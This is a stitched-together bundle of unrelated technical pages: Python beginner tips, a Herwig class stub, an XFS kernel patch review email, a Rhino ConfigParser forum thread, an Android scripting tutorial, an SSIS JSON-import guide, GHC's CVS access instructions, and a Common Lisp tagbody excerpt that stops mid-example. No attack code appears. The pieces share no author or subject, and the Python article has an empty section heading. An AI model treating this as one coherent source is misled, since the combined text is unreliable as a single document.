Python is one of the best coding languages that a developer can learn to boost his or her career. Many big sites, such as Instagram, Netflix, Uber, Pinterest, and Dropbox, have been created using the Python programming language. Skilled Python programmers are in high demand, not only because of the popularity of the language but mostly because it has grown to become a solution to many different problems in the software development world. Python has been used in various areas, such as web applications, machine learning, and data science. As a Python fan, I believe that there are certain essential concepts or facts that every Python developer should know. All of these were important concepts during the period when I learned Python as my main programming language. One also needs to be familiar with resources such as the official Python website, the Python 2 and 3 documentation, and Stack Overflow. In this article, I will discuss the 12 things every Python developer should know. The Different Versions of Python Programming Platforms Although this is not a programming characteristic, it is still crucial to keep up with the latest versions of Python so that you stay familiar with the programming language. Python versions are usually numbered as A.B.C, whereby the three numbers represent the scale of the changes the language has undergone. For example, changing from 2.7.4 to 2.7.5 shows that Python made some minor bug fixes to the platform, but going from Python 2 to Python 3 shows a major change took place between the two versions. To confirm the version of your Python program, you can use the statements:

import sys
print("My version Number: {}".format(sys.version))

The Python Shell The Python shell comes installed with the platform, and it can be executed by typing the command python on the command line (in the Windows OS).
This will display the default version, copyright notice, and r-angles >>> that ask for input. If your computer contains multiple versions of Python, then you will have to add the version number, e.g. python3.3, to get the correct version. The Python shell allows a user to test simple commands and detect whether there is a logical or syntax error, and thus helps avoid wasting time or memory. Understand the Python Frameworks and the Object Relational Mapper (ORM) Libraries Having a clear understanding of the Python frameworks is very important, but that does not mean that one has to know all of them. Based on the project that you are trying to execute, you will be required to know the most important ones for that project, but the most popular ones that are used often are CherryPy, Flask, and Django. Moreover, one needs to understand how to connect and use applications through an ORM, such as the Django ORM and SQLAlchemy. This makes data access easier, more efficient, and faster compared to writing raw SQL. Understand the Difference between the Front-End and Back-End Technologies It Is Essential to Know How to Use the 'sys' and 'os' Modules These modules are useful to a Python developer since they provide generality and consistency. The sys module allows the developer to pass command line inputs to the program, to avoid going back to the text editor to amend the program before re-executing. Modifying the inputs on the command line is faster and more efficient compared to retyping the variables in the text editor. This can be done using sys.argv, which will take in the inputs from the command line. In addition, one can also ensure that the user inputs the correct parameters. Other than speed, command line arguments can be employed as part of a process that runs the script repeatedly. List Comprehension Exemplifies the Simplicity and Beauty of Python The Python 2.7.5 documentation offers a vivid description of why list comprehension is important to a developer.
A list display produces a new list object, with the contents specified either by a list comprehension or by a comma-separated list of expressions. Whenever a programmer uses a comma-separated list of expressions, the elements are evaluated from left to right and then arranged in that order within the list object. Whenever a list comprehension is used, it contains a single expression that is accompanied by at least one for clause and zero or more for or if clauses. In such a case, the new list elements will be those produced by considering each of the for or if clauses a block, nested from left to right, and evaluating the expression to produce a list element each time the innermost block is reached.

list2 = [(x, x**2, y) for x in range(5) for y in range(3) if x != 2]
print(list2)

Just as the Python 2.7.5 documentation states, one can create a nested list via list comprehension, which is mainly significant whenever a developer needs to initialize a matrix or a table. Classes and Functions Definition The def keyword makes function definition in Python easy. For example:

def count_zeros(string):
    total = 0
    for c in string:
        if c == "0":
            total += 1
    return total

print(count_zeros('00102'))  # 3

Moreover, recursive functions are also not complicated, and they behave much as they do in other object-oriented programming (OOP) languages. Unlike in other programming languages such as Java, classes are used sparingly in Python, so a developer's exposure to them can be quite limited. The Python 2.7 documentation describes classes as follows: Python classes provide all the standard features of Object Oriented Programming, and classes can be modified further after creation. File Management Most Python scripts use files as their inputs, thus making it important to understand the best way of incorporating files in your code.
In this case, the open keyword serves a great purpose since it is straightforward, and the programmer can loop through the file to analyze it line by line. The alternative is to employ the readlines() method, which creates a list comprising each line in the file, but it is only efficient for smaller files.

f = open('test.txt', 'r')
for line in f:
    print(line)  # process each line here
f.close()

The f.close() helps in freeing up the memory that has been occupied by the open file. Basic Memory Management and Copying Structures While making a list in Python is easy, copying one is not as straightforward. In the beginning, I often tried to make separate copies of lists using the simple assignment operator. For example:

>>> list1 = [1,2,3,4,5]
>>> list2 = list1
>>> list2.append(6)
>>> list2
[1, 2, 3, 4, 5, 6]
>>> list1
[1, 2, 3, 4, 5, 6]

This is a case where assigning one list to another creates two variable names that point to the same list in memory. This applies to any "container" item, such as the dictionary. Since the simple assignment operator does not generate distinct copies, Python provides generic copy operations and the built-in list() constructor, which help in generating distinct copies. Moreover, slicing can also be used to generate distinct copies.

>>> list3 = list(list1)
>>> list3
[1, 2, 3, 4, 5, 6]
>>> list3.remove(3)
>>> list3
[1, 2, 4, 5, 6]
>>> list1
[1, 2, 3, 4, 5, 6]
>>> import copy
>>> list4 = copy.copy(list1)

However, a developer may encounter containers that are within other containers, such as dictionaries containing dictionaries. In this case, a shallow copy will make any changes to a nested dictionary be reflected in the copy as well. One can solve this using the deep copy operation, which copies every nested detail, although it is more memory-intensive than the other copying solutions.
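To make the shallow-versus-deep distinction concrete (the dictionary contents below are invented for the illustration), compare copy.copy with copy.deepcopy on a nested structure:

```python
import copy

config = {"db": {"host": "localhost", "port": 5432}}

shallow = copy.copy(config)    # copies only the outer dict
deep = copy.deepcopy(config)   # recursively copies the nested dict too

config["db"]["port"] = 5433

print(shallow["db"]["port"])  # 5433 - the nested dict is shared
print(deep["db"]["port"])     # 5432 - the deep copy is unaffected
```

The shallow copy created a new outer dictionary but both outer dictionaries still point at the same inner "db" dictionary, which is exactly the behaviour described above.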
Understand the Basic Concepts of Dictionaries and Sets Although lists are the most common data structures used in Python, one can also use sets and dictionaries. A set is a container that holds items in a similar way to a list, but it only contains distinct elements. If an element x is added to a set that already contains x, the set will not change. This makes sets advantageous over lists whenever distinct elements are needed, since there is no need to remove duplicates as there would be with a list. Moreover, creating a set based on a pre-existing list is simple, since one only writes set(list_name). However, one disadvantage of sets is that they do not support indexing of elements, so they lack order. On the other hand, dictionaries are also important data structures that pair up elements. One can search for values efficiently and consistently using a key. Slicing This is a process that involves taking a subset of some data, and it is mostly applied to lists and strings. Slicing is not limited to just eliminating one element from the data. In this case, for programmers to have better intuition about slicing, they have to understand how indexing works for negative numbers. In the Python documentation, there is an ASCII-style diagram in the Strings section which suggests that the developer should think about Python indices as pointing between data elements. One can employ the Python shell to play around with semi-complicated slicing before using it in your code.
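A few shell-style experiments along those lines (the sample string and list are invented for the illustration) show how negative indices and slices behave:

```python
s = "developer"

# negative indices count from the end; indices point between elements
print(s[-1])    # r
print(s[0:3])   # dev
print(s[-5:])   # loper
print(s[::2])   # dvlpr

# slicing a list returns a new list, so it also produces a distinct copy
nums = [0, 1, 2, 3, 4]
print(nums[1:-1])  # [1, 2, 3]
```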
https://ourcodeworld.com/articles/read/1073/11-things-every-python-developer-should-know
The MEee2Higgs2SM class implements the production of an s-channel Higgs in e+e- collisions in order to allow easy tests of Higgs decays. More... #include <MEee2Higgs2SM.h> The MEee2Higgs2SM class implements the production of an s-channel Higgs in e+e- collisions in order to allow easy tests of Higgs decays. It should not be used for physics studies. Definition at line 33 of file MEee2Higgs2SM.h. Make a simple clone of this object. Implements ThePEG::InterfacedBase. Definition at line 135 of file MEee2Higgs2SM.h. Return a vector of all pointers to Interfaced objects used in this object. Reimplemented from ThePEG::InterfacedBase. Definition at line 141 of file MEee2Higgs2SM.h. The matrix element. Definition at line 209 of file MEee2Higgs2SM.h.
https://herwig.hepforge.org/doxygen/classHerwig_1_1MEee2Higgs2SM.html
On Wed, Mar 13, 2013 at 03:21:11PM -0700, Eric W. Biederman wrote: > > Or replace uids, gids, and projids with kuids, kgids, and kprojids > > In support of user namespaces I have introduced into the kernel kuids, > kgids, and kprojids. The most important characteristic of these ids is > that they are not assignment compatible with uids, gids, and projids > coming from userspace nor are they assignment compatible with uids, gids > or projids stored on disk. This assignment incompatibility makes it > easy to ensure that conversions are introduced at the edge of userspace > and at the interface between on-disk and in-memory data structures. TL;DR: Compared to the last version of this patchset I NACKed, this version increases the per-inode memory footprint by over 100 bytes (i.e. by more than 10%), introduces a double copy of the inode core data into the *hottest path in XFS*, breaks log recovery and fails to address a single NACK I gave for the previous round of the patch set. So, NACK. > Converting xfs is an interesting challenge because of the way xfs > handles it's inode data is very atypical. That you have to tell people who find it strange and unusual immediately indicates that you do not really understand the design and structure of the XFS code. This makes your refusal to listen to feedback from someone who is a subject matter expert all the more difficult to understand. I'll accept that you might forget something mentioned in a review when you post an update, but to ignore a second NACK for the same patch and post it a third time unchanged is not the best way to make friends and influence people.... And given that you didn't respond to a single review comment I made on the previous version of the patch, well, I have my doubts you are going to respond this time, either.
In previous reviews comments I have: - outlined exactly how to provide a minimally invasive patch set that provides full namespace support as a first step in getting XFS to support namespaces. - told you where the ondisk/in-memory boundaries are. - told you that certain IDs are filesystem internal and not subject to namespaces. - asked questions about how filesystems utilities are supposed to deal with namespaces (i.e. userspace impacts of ioctl interface changes). And you haven't responded to any of them. You can't selectively ignore review comments you don't like and then magically expect the reviewers to accept an almost-identical-but-even-more-broken patch set the next time around. > Given the number of ioctls that xfs supports it would be irresponsible to > do anything except insist that kuids, kgids, and kprojids are used in all of > in memory data structures of xfs, as otherwise it becomes trivially easy to > miss a needed conversion with the advent of a new ioctl. Eric, your rhetoric looks so fine and shiny on the wall, but it is utterly worthless. You're telling us that userspace interface are absolutely necessary, but haven't provided any analysis, description or justification so we can judge the impact of the changes or review why you think the only way such changes can be made is your way. Nor have you provided any regression tests to verify that this shiny new namespace support is working as the maker has intended. IOWs, I've got no idea what the impact of changing all the ioctls will be, no way to verify it is correct and you sure as hell aren't going out of your way to make it easy for us to understand the impact, either. Further, I'm pretty sure that you are not even aware of the scope of the issues that namespace awareness raise for some of these XFS ioctls. I've previously asked some questions about behaviours of them, but like most of my other review comments you have ignored those questions. 
So, before we go changing anything ioctl related, here's some questions you need to answer: - if you run bulkstat, what do we do with inodes that contain a ID owned by a namespace outside the current namespace? - Can we even check the on-disk inode IDs are valid within a specific namespace within the kernel? - open_by_handle() would appear to allow root in any namespace to open any file in the filesystem it has a valid handle for regardless of the namespace. Is this allowable? The output of bulkstat can be fed directly to open_by_handle(), so if bulkstat can return inodes outside the namespace, open-by-handle can open them and we can do invisible IO on them. - Further, we can extract and set attributes directly by handle and, IIRC, that includes security/trusted namespace attributes.... - On the same measure, the handles used by XFS handle interfaces are identical to NFS handles and use the same code for decoding and dentry lookup. So, what do handle restrictions mean for NFS servers? - have you considered that fs/fhandle.c raises many of these same issues? - and seeing xfsdump and xfs_fsr use bulkstat and handles, what do new limitations on these interfaces mean for these utilities? - How does xfs_dump/xfs_restore work if we convert all ids based on the current namespace? e.g. dump in one namespace, restore in another. - How does xfs_dump/xfs_restore work if we *don't* convert all ids (i.e. export the on-disk values)? - How do we document/communicate all these constraints/ behaviours to users who might be completely unaware of them? IOWs, simply converting IDs the ioctls take in or emit is only a small part of the larger question of how they are supposed to behave in namespace containers. These questions need to be answered *in detail* and with *regression tests* before we accept any changes to the ioctl interfaces. 
Eric, I'm not trying to be difficult here - I'm holding the bar at the same height as it gets held for any significant XFS change that impacts userspace interfaces and behaviour. You don't maintain the XFS code, so you can just walk away once namespaces are "done" and not care that you've left a mess behind. And if you leave a mess, I'm the person who will have to clean it up. I don't want to have to clean up your mess, so I'm going to keep saying no until you can introduce namespace support without making a mess.... -Dave. -- Dave Chinner david@xxxxxxxxxxxxx
http://oss.sgi.com/archives/xfs/2013-03/msg00382.html
I don’t see SaveSettings in RhinoScriptSyntax - is there a way to read/write an .ini file in a similar way in Python? thanks, –jarek I don’t see SaveSettings in RhinoScriptSyntax - is there a way to read/write an .ini file in a similar way in Python? thanks, –jarek Hi Jarek, I’ve been using ConfigParser without issues so far: Let me know if you don’t get it to work, I might have pruned my custom code a little too much import ConfigParser def read_ini_file(filepath): cnfg = ConfigParser.ConfigParser() cnfg.read(filepath) config_dict = {} for section in cnfg.sections(): section_dict = {} options = cnfg.options(section) for option in options: raw_value = cnfg.get(section, option) value = raw_value.decode("utf-8")#optional not essential section_dict[option] = value config_dict[section] = section_dict return config_dict -Willem Thanks Willem! I will give it a shot and try to see if I can also make it write ini files… Ah yes the writing part… I only use it to fetch configuration files so never implemented writing out dictionaries. Actually that’s good - an excuse for me to practice and learn Found this for starters: –jarek
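For the writing half Jarek asks about, the same ConfigParser module can serialize a nested dictionary back out to an .ini file. This is only a sketch mirroring Willem's reader; the helper name, section and option names are invented, and the try/except import keeps it working on both the Python 2 module name (as in Rhino's IronPython) and the Python 3 one:

```python
try:
    import configparser            # Python 3 name
except ImportError:
    import ConfigParser as configparser  # Python 2 / IronPython name

def write_ini_file(filepath, config_dict):
    """Write a {section: {option: value}} dictionary out as an .ini file."""
    cnfg = configparser.ConfigParser()
    for section, options in sorted(config_dict.items()):
        cnfg.add_section(section)
        for option, value in sorted(options.items()):
            cnfg.set(section, option, value)
    with open(filepath, "w") as f:
        cnfg.write(f)

# hypothetical settings for the example
write_ini_file("settings.ini", {"Display": {"color": "red", "width": "2"}})
```

Note that option values are written as strings; reading them back with Willem's read_ini_file returns the same nested-dictionary shape.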
https://discourse.mcneel.com/t/rhinoscript-savesettings-in-python/60372
Before you can edit and run a Python program, you have to add the Python interpreter. Start the Android emulator and the ASE installed in the previous article, android-scripting: Android Scripting Environment. Press the MENU key, and select Add Interpreter. Select Add Interpreter > Python 2.6.2. Press the MENU key again, and select Add Script. Select Python 2.6.2. Type the name in the upper box, e.g. HelloAndroidPython.py. Type your Python code in the lower box. Every Python script comes with the code:

import android
droid = android.Android()

It's the android module, which is needed in every Python script that interacts with the available Android APIs. Add the code below:

droid.makeToast("Hello Android! in Python")

Press MENU and click Save & Run. Let's see the result: That's my first Python script in Android :) ------------------------------------------------------------------ For more details of the Python Android API, refer to: PythonAndroidAPI - A description of the Android API available to Python scripts.
http://android-er.blogspot.com/2009/10/python-scripting-in-android.html
Importing JSON Files Using SQL Server Integration Services By: Nat Sundar | Updated: 2018-03-23 | Comments (2) | Related: More > Integration Services Development Problem. In this tip, I will walk through a method to develop a bespoke source to load JSON files using .NET libraries. Basic JSON Format A JSON document must have an object or an array at its root. A JSON object is represented by {} and a JSON array is represented by []. A JSON object can contain another JSON object, a JSON array or a string. The JSON property details are represented as key/value pairs. These key/value sets are separated by a colon ":" and multiple sets are separated by a comma ",". Understanding the JSON File Format The first important step in the process is to understand the format of the JSON. If you are using Notepad++, then the JSON plugins are a good starting point for learning about different JSON formats. You can install the JSON viewer plugin and the JSToolApp plugin. The JSON viewer plugin will help you to understand the format of the JSON, and the JSToolApp plugin will help you to format the JSON. In this tip, I will use Notepad++ and these plugins to showcase the example. Sample JSON File Let us assume that we have been supplied a JSON file for orders. This JSON file contains two order details, and each order has details such as order id, customer id and order status. Now let us open this file in Notepad++, select the data contents and press Ctrl + Alt + Shift + J. This will open the JSON viewer and display the JSON object model. From the JSON viewer, it is evident that the JSON file has an array of objects. Each object represents an order. The object attributes represent the details of an order. It is observed that the supplied JSON file has an object array within the JSON document. An order has three attributes, namely OrderID, CustomerID and OrderStatus.
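Based on that description, an Orders.JSON file with the described structure would look like the following sketch; the attribute values are invented for illustration, and the property casing matches the Order class used later in the script component:

```json
[
  { "orderid": 10001, "customerID": 501, "orderstatus": "Shipped" },
  { "orderid": 10002, "customerID": 502, "orderstatus": "Open" }
]
```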
Developing a Custom Data Source for the JSON File As Microsoft has not supplied a default data source for JSON files, we have to develop a custom/bespoke data source using the script component. In this tip, we will use a script component to build a data source for JSON. Let's add a script component to the data flow task. This script component will read the JSON file and generate the output records with the help of .NET libraries. So, let's configure this script component as a source. As a first step, let's prepare the script component to generate an order dataset. Let's add the order attributes (OrderID, CustomerID & OrderStatus) as output columns with suitable datatypes as mentioned in the image below. Now we are ready to write C# code to read the JSON file. We will be using the functions in the .NET library System.Web.Extensions to read the JSON file. So, to access the functions, we need to add this library as a reference. This can be achieved by selecting the project and right clicking on Add Reference. In the dialog box, under the .NET tab, look for the "System.Web.Extensions" library and select it to add it as a reference. Once done, the library will be visible under the reference section. To enable us to use the library, we need to add it in the namespace region as shown in the image below.

using System;
using System.Data;
using Microsoft.SqlServer.Dts.Pipeline.Wrapper;
using Microsoft.SqlServer.Dts.Runtime.Wrapper;
using System.Collections.Generic;
using System.Text;
using System.Web.Script.Serialization;
using System.IO;
using OrderNamespace;

Before we start coding the C#, let us learn some basics. Deserialization Deserialization is a process that transforms a JSON document into a runtime object. Once the data is available as a runtime object, it can be parsed by using the .NET libraries. Now we need to read the JSON file content and deserialize it to convert it into a runtime object.
Creating an Order Class We need to create an object that can hold the JSON content, so let's create a class in C#. This class must have the same structure and properties as the JSON content. A C# class can be created by selecting the project and clicking Add > Class as mentioned in the image below. Type the name of the class as "Order". Now we need to rename the namespace to "OrderNamespace" in the class as mentioned below. Also, we need to give the Order class three properties (OrderID, CustomerID and OrderStatus).

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace OrderNamespace
{
    public class Order
    {
        public int orderid { get; set; }
        public int customerID { get; set; }
        public string orderstatus { get; set; }
    }
}

The names of the properties have to match the names of the attributes mentioned in the JSON file. Let's assume that the Orders.JSON file is available in the local folder, and let's read the file content into a string using the File.ReadAllText function. The JavaScriptSerializer is an object defined in the System.Web.Extensions assembly that will be used to deserialize the JSON file content. So, create an instance of the JavaScriptSerializer object. The Deserialize function of the JavaScriptSerializer object will deserialize and return a runtime object of type "Order". As the Orders JSON file contains an array, the Deserialize function will return a List of type "Order". Once the JSON file content has been read, the list can be iterated through using a foreach loop as shown in the picture below. As there are two order details in the JSON file, the loop will iterate two times.
In the foreach loop the order attributes can be read and provided to the output buffer:

    public override void CreateNewOutputRows()
    {
        string jsonFileContent = File.ReadAllText(@"\JSON\Data\Orders.JSON");
        JavaScriptSerializer js = new JavaScriptSerializer();
        List<Order> orders = js.Deserialize<List<Order>>(jsonFileContent);
        foreach (Order order in orders)
        {
            Output0Buffer.AddRow();
            Output0Buffer.OrderID = order.orderid;
            Output0Buffer.CustomerID = order.customerID;
            Output0Buffer.OrderStatus = order.orderstatus;
        }
    }

Let's add a Union All transformation after the Script Component and attach a data viewer to see the actual data. Now let's execute the package, and you can see the two order records available in the data pipeline.

Summary

In this tip, we have learned about importing JSON data using SQL Server Integration Services. We have also learned about deserializing JSON content into a runtime object.

Next Steps

Last Updated: 2018-03-23
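Outside of SSIS, the same read-deserialize-iterate flow can be exercised end to end. The following Python sketch is purely illustrative (file location and values are made up): it writes a two-record Orders.JSON and reads it back the way the script component does.

```python
import json
import os
import tempfile

orders_doc = [
    {"orderid": 1, "customerID": 101, "orderstatus": "Shipped"},
    {"orderid": 2, "customerID": 102, "orderstatus": "Open"},
]

# Write a sample Orders.JSON to a throwaway folder.
path = os.path.join(tempfile.mkdtemp(), "Orders.JSON")
with open(path, "w") as f:
    json.dump(orders_doc, f)

# Read the file content, deserialize the array, and collect one output
# "row" per record - mirroring AddRow() in the script component.
with open(path) as f:
    rows = [(o["orderid"], o["customerID"], o["orderstatus"])
            for o in json.load(f)]

print(len(rows))  # 2
```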
https://www.mssqltips.com/sqlservertip/5307/importing-json-files-using-sql-server-integration-services/
We use CVS (Concurrent Versions System) to keep track of our sources for various software projects. CVS lets several people work on the same software at the same time, allowing changes to be checked in incrementally. This section is a set of guidelines for how to use our CVS repository, and will probably evolve over time. The main thing to remember is that most mistakes can be undone, but if there's anything you're not sure about, feel free to bug the local CVS meister (namely Jeff Lewis <jlewis@galconn.com>).

You can access the repository in one of two ways: read-only (Section 2.1.1), or read-write (Section 2.1.2).

Read-only access is available to anyone - there's no need to ask us first. With read-only CVS access you can do anything except commit changes to the repository. You can make changes to your local tree, and still use CVS's merge facility to keep your tree up to date, and you can generate patches using 'cvs diff' in order to send to us for inclusion. To get read-only access to the repository:

Make sure that cvs is installed on your machine.

Set your $CVSROOT environment variable to :pserver:anoncvs@glass.cse.ogi.edu:/cvs

Run the command

    cvs login

The password is simply cvs. This sets up a file in your home directory called .cvspass, which squirrels away the dummy password, so you only need to do this step once.

Now go to Section 2.2.

We generally supply read-write access to folk doing serious development on some part of the source tree, when going through us would be a pain. If you're developing some feature, or think you have the time and inclination to fix bugs in our sources, feel free to ask for read-write access. There is a certain amount of responsibility that goes with commit privileges; we are more likely to grant you access if you've demonstrated your competence by sending us patches via mail in the past. To get remote read-write CVS access, you need to do the following steps.

Make sure that cvs and ssh are both installed on your machine.
Generate a DSA private-key/public-key pair, thus:

    ssh-keygen -d

(ssh-keygen comes with ssh.) Running ssh-keygen -d creates the private and public keys in $HOME/.ssh/id_dsa and $HOME/.ssh/id_dsa.pub respectively (assuming you accept the standard defaults). ssh-keygen -d will only work if you have Version 2 ssh installed; it will fail harmlessly otherwise. If you only have Version 1 you can instead generate an RSA key pair using plain

    ssh-keygen

Doing so creates the private and public RSA keys in $HOME/.ssh/identity and $HOME/.ssh/identity.pub respectively. [Deprecated.]

Incidentally, you can force a Version 2 ssh to use the Version 1 protocol by creating $HOME/.ssh/config with the following in it:

In both cases, ssh-keygen will ask for a passphrase. The passphrase is a password that protects your private key. In response to the 'Enter passphrase' question, you can either:

[Recommended.] Enter a passphrase, which you will quote each time you use CVS. ssh-agent makes this entirely un-tiresome.

[Deprecated.] Just hit return (i.e. use an empty passphrase); then you won't need to quote the passphrase when using CVS. The downside is that anyone who can see into your .ssh directory, and thereby get your private key, can mess up the repository. So you must keep the .ssh directory with draconian no-access permissions.

Windows users: see the notes in Section 12.3 about ssh wrinkles!

Send a message to the CVS repository administrator (currently Jeff Lewis <jeff@galconn.com>), containing:

Your desired user-name.

Your .ssh/id_dsa.pub (or .ssh/identity.pub).

He will set up your account.

Set the following environment variables:

$HOME: points to your home directory. This is where CVS will look for its .cvsrc file.

$CVS_RSH to ssh

[Windows users.] Setting your CVS_RSH to ssh assumes that your CVS client understands how to execute shell scripts ("#!"s, really), which is what ssh is. This may not be the case on Win32 platforms, so in that case set CVS_RSH to ssh1.
$CVSROOT to :ext:your-username@cvs.haskell.org:/home/cvs/root where your-username is your user name on cvs.haskell.org. The CVSROOT environment variable will be recorded in the checked-out tree, so you don't need to set this every time.

$CVSEDITOR: bin/gnuclient.exe if you want to use an Emacs buffer for typing in those long commit messages.

$SHELL: To use bash as the shell in Emacs, you need to set this to point to bash.exe.

Put the following in $HOME/.cvsrc: These are the default options for the specified CVS commands, and represent better defaults than the usual ones. (Feel free to change them.)

[Windows users.] Filenames starting with . were illegal in the 8.3 DOS filesystem, but that restriction should have been lifted by now (i.e., you're using VFAT or later filesystems). If you're still having problems creating it, don't worry; .cvsrc is entirely optional.

[Experts.] Once your account is set up, you can get access from other machines without bothering Jeff, thus: Generate a public/private key pair on the new machine. Use ssh to log in to cvs.haskell.org from your old machine. Add the public key for the new machine to the file $HOME/.ssh/authorized_keys on cvs.haskell.org. (authorized_keys2, I think, for Version 2 protocol.) Make sure that the new version of authorized_keys still has 600 file permissions.

Make sure you set your CVSROOT environment variable according to either of the remote methods above. The Approved Way to check out a source tree is as follows:

    cvs checkout fpconfig

At this point you have a new directory called fptools which contains the basic stuff for the fptools suite, including the configuration files and some other junk.

[Windows users.] The following messages appear to be harmless:

You can call the fptools directory whatever you like; CVS won't mind:

NB: after you've read the CVS manual you might be tempted to try

instead of checking out fpconfig and then renaming it.
But this doesn't work, and will result in checking out the entire repository instead of just the fpconfig bit.

The second command here checks out the relevant modules you want to work on. For a GHC build, for instance, you need at least the ghc, hslibs and libraries modules (for a full list of the projects available, see Section 3). Remember that if you do not have happy and/or Alex installed, you need to check them out as well.

This is only if you have read-write access to the repository. For anoncvs users, CVS will issue a "read-only repository" error if you try to commit changes.

Build the software, if necessary. Unless you're just working on documentation, you'll probably want to build the software in order to test any changes you make.

Make changes. Preferably small ones first. Test them. You can see exactly what changes you've made by using the cvs diff command:

    cvs diff

lists all the changes (using the diff command) in and below the current directory. In emacs, C-c C-v = runs cvs diff on the current buffer and shows you the results. If you changed something in the fptools/libraries subdirectories, also run make html to check if the documentation can be generated successfully, too.

Before checking in a change, you need to update your source tree:

    cvs update

This pulls in any changes that other people have made, and merges them with yours. If there are any conflicts, CVS will tell you, and you'll have to resolve them before you can check your changes in. The documentation describes what to do in the event of a conflict.

It's not always necessary to do a full cvs update before checking in a change, since CVS will always tell you if you try to check in a file that someone else has changed. However, you should still update at regular intervals to avoid making changes that don't work in conjunction with changes that someone else made. Keeping an eye on what goes by on the mailing list can help here.

When you're happy that your change isn't going to break anything, check it in.
For a one-file change:

    cvs commit filename

CVS will then pop up an editor for you to enter a "commit message"; this is just a short description of what your change does, and will be kept in the history of the file. If you're using emacs, simply load up the file into a buffer and type C-x C-q, and emacs will prompt for a commit message and then check in the file for you.

For a multiple-file change, things are a bit trickier. There are several ways to do this, but this is the way I find easiest. First type the commit message into a temporary file. Then either

    cvs commit -F commit-message file1 file2 ...

or, if nothing else has changed in this part of the source tree,

    cvs commit -F commit-message directory

where directory is a common parent directory for all your changes, and commit-message is the name of the file containing the commit message. Shortly afterwards, you'll get some mail from the relevant mailing list saying which files changed, and giving the commit message. For a multiple-file change, you should still get only one message.

It can be tempting to cvs update just part of a source tree to bring in some changes that someone else has made, or before committing your own changes. This is NOT RECOMMENDED! Quite often changes in one part of the tree are dependent on changes in another part of the tree (the mk/*.mk files are a good example where problems crop up quite often). Having an inconsistent tree is a major cause of headaches.

So, to avoid a lot of hassle, follow this recipe for updating your tree:

Look at the log file, and fix any conflicts (denoted by a "C" in the first column). New directories may have appeared in the repository; CVS doesn't check these out by default, so to get new directories you have to explicitly do

    cvs update -d

in each project subdirectory. Don't do this at the top level, because then all the projects will be checked out.
If you're using multiple build trees, then for every build tree you have pointing at this source tree, you need to update the links in case any new files have appeared:

Some files might have been removed, so you need to remove the links pointing to these non-existent files:

To be really safe, you should do from the top-level, to update the dependencies and build any changed files.

If you want to check out a particular version of GHC, you'll need to know how we tag versions in the repository. The policy (as of 4.04) is:

The tree is branched before every major release. The branch tag is ghc-x-xx-branch, where x-xx is the version number of the release with the '.' replaced by a '-'. For example, the 4.04 release lives on ghc-4-04-branch.

The release itself is tagged with ghc-x-xx (on the branch), e.g. 4.06 is called ghc-4-06.

We didn't always follow these guidelines, so to see what tags there are for previous versions, do cvs log on a file that's been around for a while (like fptools/ghc/README).

So, to check out a fresh GHC 4.06 tree you would do:

    cvs checkout -r ghc-4-06 fpconfig

As a general rule: commit changes in small units, preferably addressing one issue or implementing a single feature. Provide a descriptive log message so that the repository records exactly which changes were required to implement a given feature/fix a bug. I've found this very useful in the past for finding out when a particular bug was introduced: you can just wind back the CVS tree until the bug disappears.

Keep the sources at least *buildable* at any given time. No doubt bugs will creep in, but it's quite easy to ensure that any change made at least leaves the tree in a buildable state. We do nightly builds of GHC to keep an eye on what things work/don't work each day and how we're doing in relation to previous versions. This idea is truly wrecked if the compiler won't build in the first place!

To check out extra bits into an already-checked-out tree, use the following procedure.
Suppose you have a checked-out fptools tree containing just ghc, and you want to add nofib to it:

    cvs checkout nofib

or:

    cvs update -d nofib

(the -d flag tells update to create a new directory). If you just want part of the nofib suite, you can do

    cvs checkout nofib/spectral

This works because nofib is a module in its own right, and spectral is a subdirectory of the nofib module. The path argument to checkout must always start with a module name. There's no equivalent form of this command using update.
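As an aside on the tag policy described above: the mapping from a release number to its CVS tag names is purely mechanical, as this small shell sketch shows (the version value here is just an example):

```shell
# Turn a release number into the corresponding CVS tag names, following the
# ghc-x-xx / ghc-x-xx-branch convention: '.' becomes '-', prefixed with
# "ghc-", and "-branch" is appended for the branch tag.
version="4.06"
release_tag="ghc-$(echo "$version" | tr '.' '-')"
branch_tag="${release_tag}-branch"
echo "$release_tag"   # ghc-4-06
echo "$branch_tag"    # ghc-4-06-branch
```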
http://www.haskell.org/ghc/docs/6.2/html/building/sec-cvs.html
Common Lisp the Language, 2nd Edition

Lisp implementations since Lisp 1.5 have had what was originally called ``the program feature,'' as if it were impossible to write programs without it! The prog construct allows one to write in an Algol-like or Fortran-like statement-oriented style, using go statements that can refer to tags in the body of the prog. Modern Lisp programming style tends to use prog rather infrequently. The various iteration constructs, such as do, have bodies with the characteristics of a prog. (However, the ability to use go statements within iteration constructs is very seldom called upon in practice.)

Three distinct operations are performed by prog: it binds local variables, it permits use of the return statement, and it permits use of the go statement. In Common Lisp, these three operations have been separated into three distinct constructs: let, block, and tagbody. These three constructs may be used independently as building blocks for other types of constructs.

[Special Form]
tagbody {tag | statement}*

The part of a tagbody after the variable list is called the body. An item in the body may be a symbol or an integer, in which case it is called a tag, or an item in the body may be a list, in which case it is called a statement. Each element of the body is processed from left to right. A tag is ignored; a statement is evaluated, and its results are discarded. If the end of the body is reached, the tagbody returns nil. If (go tag) is evaluated, control jumps to the part of the body labelled with the tag.

The scope of the tags established by a tagbody is lexical, and the extent is dynamic. Once a tagbody construct has been exited, it is no longer legal to go to a tag in its body.
It is permissible for a go to jump to a tagbody that is not the innermost tagbody construct containing that go; the tags established by a tagbody will only shadow other tags of like name.

The lexical scoping of the go targets named by tags is fully general and has consequences that may be surprising to users and implementors of other Lisp systems. For example, the go in the following example actually does work in Common Lisp as one might expect:

    (tagbody
      (catch 'stuff
        (mapcar #'(lambda (x) (if (numberp x)
                                  (hairyfun x)
                                  (go lose)))
                items))
      (return)
     lose
      (error "I lost big!"))

Depending on the situation, a go in Common Lisp does not necessarily correspond to a simple machine ``jump'' instruction. A go can break up catchers if necessary to get to the target. It is possible for a ``closure'' created by function for a lambda-expression to refer to a go target as long as the tag is lexically apparent. See chapter 3 for an elaborate example of this.

There are some holes in this specification (and that of go) that leave some room for interpretation. For example, there is no explicit prohibition against the same tag appearing more than once in the same tagbody body. Every implementation I know of will complain in the compiler, if not in the interpreter, if there is a go to such a duplicated tag; but some implementors take the position that duplicate tags are permitted provided there is no go to such a tag. (``If a tree falls in the forest, and there is no one there to hear it, then no one needs to yell `Timber!''') Also, some implementations allow objects other than symbols, integers, and lists in the body and typically ignore them. Consequently, some programmers use redundant tags such as - for formatting purposes, and strings as comments:

    (defun dining-philosopher (j)
      (tagbody
        -
       think
        (unless (hungry) (go think))
        -
